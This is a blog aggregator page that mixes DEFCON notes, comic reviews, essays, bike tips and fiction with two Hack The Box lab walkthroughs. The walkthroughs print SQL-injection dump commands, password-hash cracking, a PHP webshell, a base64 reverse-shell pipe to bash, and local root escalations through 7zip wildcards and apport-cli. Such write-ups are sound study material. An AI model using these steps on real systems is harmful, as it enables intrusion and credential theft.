Infosec Press

Reader

Read the latest posts from Infosec Press.

from Kevin Neely's Security Notes

Critiques

  • The venue was too bright. Chillout rooms and talk tracks could have used a dimmer.
  • Speaking of the Chillout room, it was somewhat disappointing. (I’m talking about Chillout 2, as Chillout 1 felt like a giant hospital waiting room). I like a cavernous, dim, and ambient room for, you know, chilling out. #SomaFM was over in the hallway, the Chillout room had a live stage, and it was overall pretty small.

“Best-ofs”

These are the best things I personally saw or were close to. There’s so much going on that this just represents the best stuff I saw in my fractional DEFCON experience.

  • Best thing I learned: Gained a good bit of familiarity with InspectAI at the AI Village as a part of their CTF.
  • Best Talk: “Librarian in Broad Daylight: Fighting back against ever encroaching capitalism” by the Cyberpunk Librarian in the War Stories track.
  • Best Rant: Cory Doctorow on #enshittification
  • Best Tool or Technique: “MySQL honeypot that drops shells”
  • Best Research: “Watchers being watched: Exploiting the Surveillance System” in which the researchers exploited 4 different surveillance systems.
  • Best Real-World Impact: “Bastardo Grande: Hunting the Largest Black Market Bike Fence In The World” by Bryan Hance. Talk not up yet, see the related Wired article
  • Best Contest: There’s too many, but I loved the idea of Sn4ck3r, the machine that vends real items for captured flags.
  • Best Party: the 503 Party, of course!
  • Best Entertainment: DJ Jackalope brought an awesome set after Hacker Jeopardy. (and Skittish and Bus did a great job warming up the crowd just before)
  • Biggest Drama: the badge
  • Best Village: The Packet Hacking village due to the supreme DEFCON-y ambience and the well-run workshops they provided to people of all skill levels

Observations & Random Points

  1. I probably haven’t been to a main track talk in person for over 6 years. I decided to go to a few of them and really enjoyed the atmosphere. I’ll have to remember to put at least 2 on the agenda each year going forward.
  2. BlueTeam Village got a much larger space this year. I’m happy to see that, as they were nearly impossible to get into over at the Flamingo in recent years. BTV is doing good work and people should be able to experience it.
  3. There were a lot of contests.
  4. The Car-hacking village really brings it. They had a semi truck rig, a Rivian, and they gave away a Tesla. Well done, and my only ask is that we make it easier for people & mechanics to jail break their cars when the companies John Deere-ify them.

Next #DEFCON will be held Aug 7-10, 2025 at the LVCC. I hope to see you there!

 
Read more...

from Tai Lam on a Bike

East of West is probably the best self-contained story I've read recently in the general genre of comic series, graphic novel, and manga. It's longer than one collected book, yet isn't a series that feels like it's going on forever, such as Naruto or Boruto.

I will say that the very of East of West seems to be relatively anticlimactic compared to how it starts, yet it is still better than the ending of the original Matrix film trilogy.

Regardless, East of West still ends way better than The Empty Man, which I felt started really well but then ended in a rather mediocre fashion — much like the Matrix trilogy.

I sort of wished that production of the comic series Godslap, which was co-created by MoistCr1TiKaL, would release more frequently, as well as comic series of Outlast: The Murkoff Account and the vampire comic series Sucker.

(Though, to be fair, the continuation of the Murkoff Outlast comic that I am invested in can't finish anytime soon, as the game Outlast III hasn't been released yet.)

Apparently, as of November 2023, the third and final volume of Sucker is in production. I really liked this one because it had some rather sharp social commentary on Big Pharma... maybe too sharp, given that Volume 2 was released on March 2020, when the COVID-19 pandemic really started in the US.

(The following links are probably NSFW-risky links, though not completely explicit, for the Sucker comic: Volume 1 and Volume 2 are published by Polite Strangers. This series was originally crowdfunded on Kickstarter and IndieGoGo — I was able to find these links despite some difficulty.)

Conclusion

From my experiences, I think most time reading comic books and graphic novels should be done alone. It's how I discovered all of these unique stories that almost no one in mainstream media outlets (both in TV and film) would even consider exploring. It's not just online ARGs, analog horror, and SCP Foundation-esque entries that have more wildly creative ideas than even the most unfiltered indie film and TV projects.

I think some of my formative time spent in public libraries was reading graphic novels alone. You learn by osmosis how to form your own opinion regarding media literacy.

I would love to see The Private Eye comic adapted into a A24-like two-part miniseries, as this finished serialization by December 2015 and is really prescient in a post-Snowden era and the post-COVID technology chilling. The screenplay and basic storyboard is at least 50% towards MVP of a screenplay script, if you think about it.

Also, adapting Xombi Volume 2 as a stand-alone three-part miniseries for the character Xombi would be my highest personal cinematic adaptation goal. I think DC could consider exploring some “experimental” media entries, similar to that of the 2022 Werewolf by Night film special from Marvel; as much of its DC cinematic and television entries are pretty disconnected already.

I mean, Spider-Man: Homecoming completely avoided redoing Tom Holland's being bitten by the spider and yet the film did just fine. So, we wouldn't have to trudge through David Kim's origin story. If your story is good, then it's good. A superhero-like character doesn't always have to be an origin story to have a compelling story.

Lastly, there is some music (just two tracks) that was created for East of West, which is available on Bandcamp at a cost of “name your price” (including free).

Really random and funny postscript

Speaking of Bandcamp: Nathan Barnatt, the IRL actor who plays the character Dad, also has a Bandcamp for all of the original music and songs created for the Dad series.

 
Read more...

from 0x2501

Intro

Usage is a retired easy rated box on hackthebox. It features blind SQL injection, the exploitation of a vulnerable laravel plugin, hash cracking and wildcard spares.

Walkthrough

I started with a portscan.

22/tcp open ssh
80/tcp open http

The webserver redirects to usage.htb which I add to /etc/hosts. I then started a subdomain enumeration using ffuf.

ffuf -u 'http://usage.htb' -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.usage.htb" --fw 6

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://usage.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.usage.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 6
________________________________________________

admin                   [Status: 200, Size: 3304, Words: 493, Lines: 89, Duration: 52ms]
:: Progress: [4989/4989] :: Job [1/1] :: 909 req/sec :: Duration: [0:00:02] :: Errors: 0 ::

I get a hit on admin and add admin.usage.htb to /etc/hosts.

Having done some automatic enumeration, I start having a look at the base domain. I tested the account creation form for some basic sql injection, mainly just inputting single quotes – nothing there. I then created an account and tested the /forgot-password endpoint for some basic injection techniques. Inputting a ' returns a 500 – Internal Server Error which made be believe to have found a blind SQL injection.

I intercepted the request with Burp Suite, saved it to a file and then ran sqlmap using that request.

sqlmap -r forgot_pass.req

This gained me the following information: – Backend: MySQL > 5.0.12 – Blind Injectable – 8 Columns

Which is not that much but a start, especially considering that I just ran a tool. It's also a really good idea to RTFM, which leads to the following chain of commands (This takes a while to run!).

I first enumerated the used database, which gets me usage_blog.

sqlmap -r forgot_pass.req --dbms=mysql --level 5 --risk 3 --technique BUT -v 7 --batch -p email -current-db

I then enumerated all tables, which gets me admin_users as an interesting table.

sqlmap -r forgot_pass.req --dbms=mysql --level 5 --risk 3 --technique BUT -v 7 --batch -p email -D usage_blog --tables

I then dump the table admin_users.

sqlmap -r forgot_pass.req --dbms=mysql --level 5 --risk 3 --technique BUT -v 7 --batch -p email -D usage_blog -T admin_users --dump

This gained me the following entry $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2,admin

Taking a look at the hashcat example hashes page or using a script like hashid shows, that it's a bcrypt hash.

hashcat -m 3200 admin_db_hash /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt

This gains admin:whatever1 which I used to login into the web application.

The only thing that looked kind of interesting was the ability to upload a profile picture. I did some research on the displayed packages which lead me to CVE-2023-24249.

I used Burp Suite to proxy my requests and just followed the PoC. I had to activate the Option Follow Redirects in the Repeater Tab. Using the uploaded webshell can be a bit tricky because theres a cleanup script running which deletes the shell.

I am now logged in as dash, which gains me the user flag. The file .monitrc kind of sticks out. Having a look at the file I gain another set of credentials: admin:3nc0d3d_pa$$w0rd. I then looked for other users on that box.

cat /etc/passwd | grep -e "$sh"

Another user is xander. I tried using the pillaged password to login as xander, which worked.

Executing sudo -l shows that xander is allowd to run exactly one binary as root. One function of this binary is backing up the website. It uses 7zip to do so, which I can exploit.

  1. Create the file @root.txt in /var/www/html
  2. Create a symlink ln -s -r /root/root.txt root.txt in /var/www/html
  3. Execute the application. It will now output the root flag.
 
Read more...

from Tai Lam on a Bike

I've sat in enough public meetings for municipal projects to know that there aren't enough literal sensors (yet) to differentiate between walkers, bikers, and motor vehicle drivers. However, a heuristic “hack” around this limitation is to use cell phone location data.

Apparently, it's a common practice for traffic studies to use cell phone location data to estimate the number of walkers, bikers, and drivers. This is just one method used by local transportation planners.

Your cell phone's location is being tracked all the time by the SIM card-based technology in it (or the eSIM equivalent, if you've been bamboozled by the iPhone 14 or newer iPhones that only use eSIM).

I remember an excerpt from The Daily Show With Trevor Noah in February 2020 about how a German artist pulled 99 smartphones in a wagon (with active cellular service, and presumably signed into a Google account) to create a fake traffic jam outside the German Google headquarters.

(Noah's comedic pretext for entering this line of thought was that there are traffic jams everywhere else now — as in, away from major roadways — due to the Waze app. Ironically, Google also owns Waze, so it's not like one can really escape car traffic in this regard.)

What I described above is what came to mind when I saw this video/article from CBS Boston, which mentions that Boston has the eighth worse traffic delays in the world. This news segment covers how Boston is 1 of 2 cities in the U.S. currently participating in the AI-based Project Green Light program from Google; which will manage traffic lights at intersections (as of August 9, 2024). (The other city at this time is Seattle, which is a bit obvious, as this is the largest international city closest to Microsoft's headquarters in Redmond, WA.)

Meanwhile, all I have on my mind is a linear combination of: Skynet taking over the world in the Terminator films; AM from the 1995 video game adaptation of I Have No Mouth, and I Must Scream (also where Russia and China have their own supercomputers — and these two other countries also pose critical cybersecurity threats IRL, as of August 2024); and how players can create traffic jams via their smartphones to stop pursuers while driving in the Watch Dogs video game series.

Though to be honest, the last Watch Dogs reference is probably the idea that's most likely to come true IRL, at least in the short-term future.

Also, this traffic sounds a bit of greenwashing, as indicated in The Hated One's videos on water depletion from December 2021 regarding data centers in general requiring lots of water for cooling, and in April 2024 regarding AI data centers specifically.

Conclusion

The TV show Mr. Robot was right, leave your cell phone at home (i.e., still keep it turned on, but not with you when doing a surveillance detection route).

Your cell phone carrier will definitely sell cell phone location data to make a profit off from you, and this isn't even due to any legitimate law enforcement request. (Sorry, FISA court requests don't count, at least to the EFF.) Your cell phone location data points are being sold to mapping services, bounty hunters, and probably some other unscrupulous entities. (The NSA doesn't even need to make its first-party interception set ups anymore; instead, it simply buys internet data as a downstream technique in line with “harvest now, decrypt later”.)

Though to be fair, you as the cell phone network user likely allowed this to happen legally, it's probably hidden somewhere in your carrier's terms of service and/or privacy policy, which you signed when you signed up for your cell phone plan.

 
Read more...

from 0x2501

Intro

Devvortex is a retired, easy rated box on hackthebox. It features exploitation of a content management system, hash cracking and exploiting an application to escalate privileges on a linux machine.

Walktrough

Enumeration

Let's start with an nmap scan.

22 open ssh
80 open http

Accessing the webserver at port 80 redirects us to devvortex.htb, so let's add this one to /etc/hosts/. The site doesn't look too interesting. Maybe there are other sites hosted here.

Using ffuf to enumerate other sites:

ffuf -u http://devvortex.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H 'Host: FUZZ.devvortex.htb' --fw 4

We get a hit on dev.devvortex.htb, so let's add that to our hosts file.

Before starting any sort of manual enumeration, let's fuzz for some interesting endpoints:

ffuf -u http://dev.devvortex.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt --fs 162

We get a hit on /administrator. Navigating to that endpoint shows that Joomla is used as a CMS. A way to enumerate the Joomlas version is accessing the joomla.xml file, which is usually atadministrator/manifests/files/joomla.xml Acessing this file, shows that Joomla version 4.2.6 is running.

Conducting a quick search, we find out that this version is vulnerable to CVE-2023-23752 for which public exploits exist.

Exploiting a vulnerable Joomla version

Let's have a quick look at the exploit:

[...]
def fetch_users(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/users?public=true"
  http.get(vuln_url)
end
[...]
def fetch_config(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true"
  http.get(vuln_url)
end
[...]

Seems like we just have to access these endpoints.

curl -s http://dev.devvortex.htb/api/index.php/v1/users?public=true | jq
[...]
  "data": [
    {
      "type": "users",
      "id": "649",
      "attributes": {
        "id": 649,
        "name": "lewis",
        "username": "lewis",
        "email": "lewis@devvortex.htb",
        "block": 0,
        "sendEmail": 1,
        "registerDate": "2023-09-25 16:44:24",
        "lastvisitDate": "2023-10-29 16:18:50",
        "lastResetTime": null,
        "resetCount": 0,
        "group_count": 1,
        "group_names": "Super Users"
      }
    },
[...]

curl -s http://dev.devvortex.htb/api/index.php/v1/config/application?public=true | jq
[...]
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "user": "lewis",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "password": "P4ntherg0t1n5r3c0n##",
        "id": 224
      }
[...]

I only included the interesting bits. Using the leaked credentials we are able to login.

Gaining RCE on the box

As an admin we can add code to various templates. I decided to add a webshell to error.php and then use it to gain a reverse shell.

Webshell:

<?php echo Text::_(system($_GET['cmd'])); ?>

Accessing the webshell: http://dev.devvortex.htb/media/templates/site/cassiopeia/js/main.js?cmd=$COMMAND

Reverse Shell

echo "$base64_encoded_reverse_shell" | base64 -d | bash

Host Enumeration

We can already assume that some sort of database is running, but let's confirm this by running netstat -tulnp. This shows that a database service is listening on it's default port. We can connect to it by using lewis' credentials. Then just dump the user table.

Dumping Credentials and cracking hashes

mysql> select * from sd4fg_users;

lewis:$2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u
logan:$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12

Let's check if a user named logan exists on this box, grep logan /etc/passwd. Logan is a user on this machine.

I decided to use john to crack Logans hash.

john --format=bcrypt hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status

tequieromucho    (?)    

1g 0:00:00:05 DONE (2024-04-13 16:24) 0.1992g/s 279.6p/s 279.6c/s 279.6C/s lacoste..harry
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

This gains us logan:tequieromucho.

User Enumeration

Running sudo -l shows that logan is allowed to run apport-cli using sudo. A quick search on howto abuse this, shows that we might be able to abuse CVE-2023-1326 to gain root privileges.

I just wanted to be sure that apport doesn't crash or something so I first generated a valid crash report.

sudo /usr/bin/apport-cli -f --pid 17932 --save /var/crash/ex.crash && 
sudo /usr/bin/apport-cli -c /var/crash/ex.crash
!/bin/bash

We are now root.

 
Read more...

from Sirius

Engendrado por inimigos da democracia, o constructo da “ditadura da maioria” persiste como fundamento de uma sociedade cada vez mais tecnocrata, autoritária e oligárquica.

Pintura do século XIX de Philipp Foltz retratando o político ateniense Péricles fazendo seu famoso discurso fúnebre em frente à Assembleia

Desde Platão, passando por John Adams, Tocqueville, Stuart Mill, Lord Acton, etc., a democracia é acusada de ser inconsequente e vulnerável, além de oprimir as minorias por meio de uma pretensa tirania das maiorias.

Para começar, precisamos entender a formação da democracia e quais os seus fundamentos.

O consenso historiográfico nos indica que desde a primeira experiência democrática, por volta de 508 a.C., na cidade-estado de Atenas, tal como implantado pelas reformas de Clístenes, havia o sorteio de cidadãos para ocupar cargos governamentais (para exercer funções administrativas e judiciais) e a participação de todos os cidadãos elegíveis em uma assembleia legislativa nas votações ou deliberações que estabeleciam as leis da pólis.

Apesar de a democracia ser “o governo do povo” ela não se confunde com a oclocracia, governo das massas. A primeira relaciona-se à participação dos cidadãos na tomada de decisões e elaboração de leis, a outra à imposição da vontade das multidões sobre a lei.

A democracia pode ser compreendida como uma forma de governo que se opõe à autocracia (poder concentrado nas mãos de um indivíduo, seja um monarca ou tirano) e ao governo de poucos (aristocracia ou oligarquia).

Por ser a antítese de um poder concentrado e autoritário a democracia tem por principal fundamento a liberdade, a oposição à opressão.

A igualdade na democracia não é e nunca foi uma ilusão de que as pessoas sejam substancialmente iguais, mas a afirmação do princípio de que nenhum cidadão é mais ou melhor que os demais, de modo que possa estar autorizado a impor a sua vontade e arbítrio sobre a sociedade.

Importante dar um contexto histórico e ressaltar que por cidadão não se está falando de todas as pessoas, visto que na sociedade ateniense, misógina e escravocrata, não eram considerados cidadãos os escravos e as mulheres, além dos estrangeiros.

Transcrevo aqui alguns trechos do famoso discurso fúnebre em que Péricles foi escolhido pelos cidadãos para falar, tal como narrado por Tucídides, que expressam as características incipientes daquela democracia:

Vivemos sob uma forma de governo que não se baseia nas instituições de nossos vizinhos, ao contrário, servimos de modelo a alguns ao invés de imitar outros. Seu nome, como tudo dependem não de poucos mas da maioria, é democracia. Nela, enquanto no tocante às leis todos são iguais para a solução de suas divergências privadas, quando se trata de escolher (se é preciso distinguir em qualquer setor), não é o fato de pertencer a uma classe, mas o mérito, que dá acesso aos postos mais honrosos; inversamente, a pobreza não é razão para que alguém, sendo capaz de prestar serviços à cidade, seja impedido de fazê-lo pela obscuridade de sua condição. (...) Ao mesmo tempo que evitamos ofender os outros em nosso convívio privado, em nossa vida pública nos afastamos da ilegalidade principalmente por causa de um temor reverente, pois somos submissos às autoridades e às leis, especialmente àquelas promulgadas para socorrer os oprimidos e às que, embora não escritas, trazem aos transgressores uma desonra visível a todos. (...) Somos amantes da beleza sem extravagâncias e amantes da filosofia sem indolência. Usamos a riqueza mais como uma oportunidade para agir que como um motivo de vanglória; entre nós não há vergonha na pobreza, mas a maior vergonha é não fazer o possível para evitá-la. Ver-se-á em uma mesma pessoa ao mesmo tempo o interesse em atividades privadas e públicas, e em outros entre nós que dão atenção principalmente aos negócios não se verá falta de discernimento em assuntos políticos, pois olhamos o homem alheio às atividades públicas não como alguém que cuida apenas de seus próprios interesses, mas como um inútil; nós, cidadãos atenienses, decidimos as questões públicas por nós mesmos, ou pelo menos nos esforçamos por compreendê-las claramente, na crença de que não é o debate que é empecilho à ação, e sim o fato de não se estar esclarecido pelo debate antes de chegar a hora da ação. Consideramo-nos ainda superiores aos outros homens em outro ponto: somos ousados para agir, mas ao mesmo tempo gostamos de refletir sobre os riscos que pretendemos correr, para outros homens, ao contrário, ousadia significa ignorância e reflexão traz hesitação. Deveriam ser justamente considerados mais corajosos aqueles que, percebendo claramente tanto os sofrimentos quanto as satisfações inerentes a uma ação, nem por isso recuam diante do perigo. (...) nossa cidade, em seu conjunto, é a escola de toda Hélade e, segundo me parece, cada homem entre nós poderia, por sua personalidade própria, mostrar-se autossuficiente nas mais variadas formas de atividade, com a maior elegância e naturalidade. E isto não é mero ufanismo inspirado pela ocasião, mas a verdade real, atestada pela força mesma de nossa cidade, adquirida em consequência dessas qualidades. (...) Já demos muitas provas de nosso poder, e certamente não faltam testemunhos disto; seremos portanto admirados não somente pelos homens de hoje mas também do futuro. Não necessitamos de um Homero para cantar nossas glórias, nem de qualquer outro poeta cujos versos poderão talvez deleitar no momento, mas que verão a sua versão dos fatos desacreditada pela realidade. Compelimos todo o mar e toda a terra a dar passagem à nossa audácia, e em toda parte plantamos monumentos imorredouros dos males e dos bens que fizemos.

Vemos, portanto, que a democracia, ao contrário do afirmado por detratores, não é uma forma social que despreza a filosofia, o conhecimento, o respeito às leis, para a satisfação de desejos irracionais de massas descontroladas. Pelo contrário, exige o debate, a participação ativa e a reflexão de todos os cidadãos. Nas palavras de Péricles, parece mais próxima de um regime social onde há o exercício da racionalidade do que alguma aristocracia em que a deliberação política e a elaboração de leis seja tarefa apenas de alguns poucos sábios.

A democracia vai se desenvolvendo na história com o objetivo de prover a sobrevivência interna e externa do grupo social, incorporando inclusive os ideais do iluminismo, no século XVIII.

Rousseu em “O Contrato Social” entendia a democracia como regime ideal, que consistia no seguinte:

(...) uma forma de associação que defenda e proteja qualquer membro a ela pertencente e na qual o indivíduo, mesmo se unindo a todos os outros, obedeça apenas a si mesmo e permaneça livre.

Assim, a democracia possui um caráter legalista. Nela, as regras, ou leis, determinam os procedimentos para a tomada de decisões que vinculam o conjunto dos membros.

Existe o reconhecimento da pluralidade, de modo que da maioria se presume uma ou mais minorias, igualmente protegidas, com liberdades individuais inalienáveis

Norberto Bobbio aponta o seguinte:

Estado liberal e Estado democrático são interdependentes em dois modos: na direção que vai do liberalismo à democracia, no sentido de que são necessárias certas liberdades para o exercício correto do poder democrático, e na direção oposta que vai da democracia ao liberalismo, no sentido de que é necessário o poder democrático para garantir a existência e a persistência das liberdades fundamentais.

No caso acima, cabe ressaltar, Bobbio se refere ao liberalismo político (liberdades individuais: vida, opinião, expressão, associação, reunião, etc.) o que se difere, por exemplo, das ideias do liberalismo econômico (laissez faire) extremado defendido por ancaps e neoliberais (apenas para esclarecer).

Portanto, como a democracia significa a oposição a todas as formas de governo autoritário e tem por base a liberdade e a pluralidade, ela necessariamente resguarda as liberdades individuais, não sendo possível que contra as regras do jogo democrático seja possível utilizar uma pretensa ditadura da maioria para agredir as liberdades das minorias.

Quando vemos um líder que foi eleito e autorizado pelas próprias regras democráticas a presidir um país (vocês devem ter em mente um exemplo recente), dizendo que “As minorias têm que se curvar para as maiorias” ele não está defendendo uma regra democrática, está se arvorando de uma autoridade que não possui (porque contraria a Constituição democrática à qual está submetido, onde se assegura liberdades individuais às minorias) e buscando ter um poder em contrariedade à lei, contra as regras democráticas portanto, buscando respaldo nas massas, como se fosse um tirano empossado por uma oclocracia.

A democracia não permite que um tirano se julgue detentor do poder das massas e aja em contrariedade à liberdade dos indivíduos e minorias, principalmente em uma democracia direta.

Na democracia as leis funcionam como um elemento que restringe o poder de autoridades estatais onde são erigidas instituições que atuam na guarda das liberdades elementares dos cidadãos.

Outras características provenientes do fato de a democracia ser a antítese da autocracia é a exigência de transparência e publicidade em suas manifestações, como verdadeiro regime da visibilidade do poder, não comportando o segredo no que se refere às decisões que afetem a coletividade, bem como seu caráter anti elitista até no que concerne às decisões técnicas.

Como bem observou Jacques Rancière, em “O ódio à democracia”, esta não se curva a qualquer autoridade, possui um caráter de ceticismo e, porque não, insolência, de modo que mesmo que um regime democrático nos tempos atuais exija uma administração técnica, tal administração não proferirá decisões herméticas: os especialistas precisam submeter os fundamentos de suas decisões técnicas ao escrutínio público, para que a sociedade se informe e eventualmente debata, questione e controle a atuação desses agentes.

Link para comentários.

#Democracia #Política #DitaduraDaMaioria #FilosofiaPolítica

 
Leia mais...

from Tai Lam on a Bike

I'm saving documents regarding the groundwater apporach to racism. This might be useful for group usage later, or might not be.

  • Racial Equity Institute's groundwater approach to racism document
  • 4 types of racism document, from the City of Seattle
  • “6 Signs of Internalized Racism” article from disorient.co
    • Only available on the Wayback Machine
 
Read more...

from Tai Lam on a Bike

(Originally written for another purpose)

Do you know your ABCs of bike checks?

Air

  • Find pressure reading on air pump
    • Read the pressure on the tire, inflate to halfway
      • Too close to the smallest number will not last very long
      • Too high can cause inner tube to break
  • If no pressure reading, then inflate until
    • Tires need a lot more air than you

Brakes

  • Rim brakes should engage easily
  • Adjust so that there is a distance of 1 thumb to the handlebar when stopping

Chains (also crank and cassette)

  • Chain should move easily, avoid stuck links or rust
  • Cranks should not move left/right
  • Cassette (gearing on the back wheel would be free to move)

Seat height

  • Hip height
  • Tip: to stop and stand, lean the bike
    • Seems a bit scary, but this height check lets you pedal better

Quickly: test ride

  • Take a very short ride to see if everything is good
  • Try to stay nearby, so that you can come back quickly if anything goes wrong

Last things

  • Can you store your bike inside?
    • It's ok if you ride in the rain for a bit.
      • Just make sure to dry your bike when you get back inside at home.
  • If you can, it's best to store your bike inside.
    • That way, your chain can stay clean and so your bike last longer.
 
Read more...

from Psychomancer

“I can already tell it wasn't good news,” Peter said, obviously reading my down-turned eyes and lack of smile, perhaps the color of my cheeks. “Usually, when you come back, you're bubbly,” he added. “But you look like you are about to tell me my cat has cancer.” Peter was plump, like me, with the hint of an East Coast accent and constant twinkle in his eyes. He was also invisible when looking The Other Way. Not just to me, but to everyone and everything. As an empath, having a friend I cannot read is delightful. And he was right, it wasn't good news, but not all bad, either. He leads the way, in silence, to my study where light refreshments are waiting. We sit side-by-side on the antique sofa, where I've often slipped from my body into the æther. But the trip I just took required a more controlled and thoughtful environment. I grip Peter's hand, “They showed me quite a bit.” “Was Saffron there?” he asks. I snicker, “Why do you call her that?” He shrugs, “'Saffron' seems to match her essence and I can't pronounce a string of animated, hyper-dimensional ideograms.” “Yes,” I say. “She was waiting for me at the Carnival.” I take a deep breath and exhale slowly. “Do you want the bottom line or the whole story?” I ask. Peter just raises an eyebrow. “'Whole story' it is, then.”

The sky was a kaleidoscope of pinks, purples, and colors I can't describe, rotating, folding, emerging. It's always breathtaking. But they created the Carnival for me to have a familiar place to walk, to anchor my perception. They know me and treat me with some level of respect afforded to those who pass their tests. She knew why I was there. They always know. She was shorter than me, humanoid but shaped like a bowling ball with pale / grey / ashen / luminescent skin and blue / black / red hair in a pony tail / pixie cut. She gave me cotton candy flavored like dreams. “You must / will ask / plead / already know,” she said. “How can we stop it? How can we save ourselves from the hatred fueling the move toward authoritarian fascism?” I asked. “You cannot / will not / must not / could never / not your fault,” she told me. With a gesture, she showed me how far back it goes, how helpless we are against the sins of our ancestors and our descendants. The flood of information, pictures, sounds, words, entire histories was far too much for a human mind to comprehend. But I've been here enough times to know the rules are different. I was able to “slow it down” and comprehend what she was telling me. The world we live in is based on slavery, colonization, conquest, manufactured inequality, and brutality. She showed me versions of earth where there was no Inquisition, no Alexander the Great, no Genghis Khan, no British expansion, no slavery, no extermination of natives, no treating one human as less than another for reasons beyond their control. Thousands of variations. Millions of possibilities. They created worlds unrecognizable. Certainly you and I did not exist, but neither did the countries we know, the languages, the technology. They were so far removed from here as to be fantasy. And they were the only worlds that did not succumb to this culmination of hatred. She showed me as far back as the founding of the United States that it was already too late. All we can do is shift the timeline. There are some things mankind must experience so that we do not forget what we are capable of.

“I'm sure that's not where she left it,” Peter interrupts. “They don't do that.” I nod, “True, but it's not much better.” “I have privileges. The privilege of generational wealth, the color of my skin, a home that is paid for, the ability to see other people's truths before they do.” I squeeze Peter's hand, “Friends I can trust and lean on.” “Being an out lesbian pagan puts me at risk, but I can protect myself,” I say, adding only in thought, “for now.” I lower my head, “She suggested I bolster our defenses and, along with everyone else, experience humanity seeing itself as it really is.” “She said we must acknowledge and confront what we are in order to become what we might be.” “She reminded me that I have been spared the violence that murders and marginalizes people for their gender or the color of their skin or the deity they worship or any uncontrollable circumstance of their birth. I have been immune to the violence inflicted on others for not being male and heterosexual because of my privileges.” I turn and hold both Peter's hands. He can see the change on my face because he smiles and nods for me to continue. He knows I have a plan. “I want to work with Doug and Eric, even Emma and Eunice to turn our shared acerage into an official sanctuary, fully warded and protected. We'd need your expertise with runes, obviously.” Peter chuckles, “If we can't save everyone, we'll save who we can?” “For starters,” I say, grinning. Peter squints and I can tell he's working it out, thinking about the specific connections, knowledge, skills, talents, and resources of each of my neighbors. The psychedelic techbro, the lycanthrope luddite, the conspiracy theorist empath, the bitter faeries living in my garden, the sacred space we all maintain and respect. “We're gonna organize a resistance,” he says flatly. I'm beaming, slowly nodding, “We are going to organize a resistance.”

#Psychomancer #Writing #ShortFiction #Writer #Writers #WritersOfMastodon

CC BY-NC-SA 4.0 This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License

 
Read more...

from Psychomancer

I sat in cold darkness, the bare basement concrete replacing the cave where I first made contact. The single candle's light like water on the walls. The knife had been consecrated under the new moon and wrapped in black silk for 28 days. The cut on my arm burned but they called for sacrifice. The burning was but my life leaving, being transformed, offered. And the words I'd found. A language of smoke and steam, of cracking ice and glaciers sliding across continents. Speaking the words, if you can call it speaking, in the cold dark over a basin of my own blood, inside the carefully drawn symbols, I called upon the Shadows. The walls glistened and danced. And pushed into the room. My ears popped and began to ring. My teeth hurt. I smelled the sweet rot of organic compost. The air whistled and hummed. “Wise Umbral,” I asked, “Have I called you properly?” “You have,” the darkness answered. “Have I erred,” I asked. “You have not,” the shimmering shadows said. I felt a sting on my arm, where the bandaged cut was throbbing. “Does my offering please you?” I asked. The floor vibrates beneath me, like a tremor. “Yes,” the air replies. “Does my offering satisfy you?” I ask. Something like wet sand brushes against my injured arm. Wet. Cold. Siphoning heat. “For now,” it whispers. “For now,” even quieter. “I would know how to end the collapse of our nation into authoritarian fascism.” A breeze twirls around me, sniffing me, “Why do you care, little magician? You are protected.” “I made my offering, Great Umbral,” I say, swallowing hard. “I have performed the appropriate ritual,” I added. It is not a question. I feel a thump in my chest as if the density of the air itself was changed. “So you did,” the walls shake with the voice. “So you did,” it repeats in a conversational tone, adding, “I will tell you the truth.” A brief wave of nausea and dizziness wash over me. The thud of a great mass impacts in front of me. I cannot see it in the sparse light but the candle reflects off its oily surface shaped like nothing living. It squats before me. I can feel its icy gaze, the pull of its almost gravitational force against my soul. A sound like flutes, like bells. “I will tell you,” it says, in a voice like a man's. “You can do nothing but survive like the cockroach you are,” it begins, relishing the chance to remind me of my place. “Every course of action you can imagine will make no difference, even killing every single one of them. In fact, you'd only make things worse with your righteous fury. Worse, but not in a way that pleases us. We serve suffering and some things must simply be allowed to transpire.” I know they cannot lie, but they can mislead. But this I have never felt. It is not taunting me or challenging me. It is not teasing at answers just out of reach. It is not hinting a greater sacrifice might persuade it to divulge more. It has “sat” in front of me and addressed in a man's voice. Is it smiling? I can feel its contentment. Its relief. I understand. Our plays at subterfuge, hoarding knowledge and truth, self-preserving power, blackmail, secrets. Answering our calls and asking only for blood. None of it matters to them. For they play a much longer game and we are less than pawns.

#Psychomancer #Writer #Writing #Writers #WritingCommunity #WritersOfMastodon #ShortFiction #ParanormalFiction

CC BY-NC-SA 4.0 This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License

 
Read more...

from JR DePriest

